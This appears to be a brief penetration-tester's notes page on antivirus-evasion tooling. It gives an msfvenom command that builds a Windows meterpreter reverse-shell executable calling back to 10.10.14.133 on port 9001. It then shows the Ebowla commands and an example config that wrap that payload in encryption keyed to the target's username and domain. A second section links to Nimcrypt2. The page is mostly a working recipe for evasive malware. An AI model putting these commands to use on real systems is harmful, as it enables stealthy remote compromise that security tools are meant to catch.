# Tools

## Ebowla

We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.

* <https://github.com/Genetic-Malware/Ebowla>

```
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
```

An example genetic.config,

```
...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''
```

## Nimcrypt2

* <https://github.com/icyguider/Nimcrypt2>

* <https://twitter.com/binitamshah/status/1594698510762332160?s=46&t=LDLfp0MIS1Dsg420TRpKXA>

* [<br>](https://twitter.com/binitamshah/status/1594698510762332160?s=46\&t=LDLfp0MIS1Dsg420TRpKXA)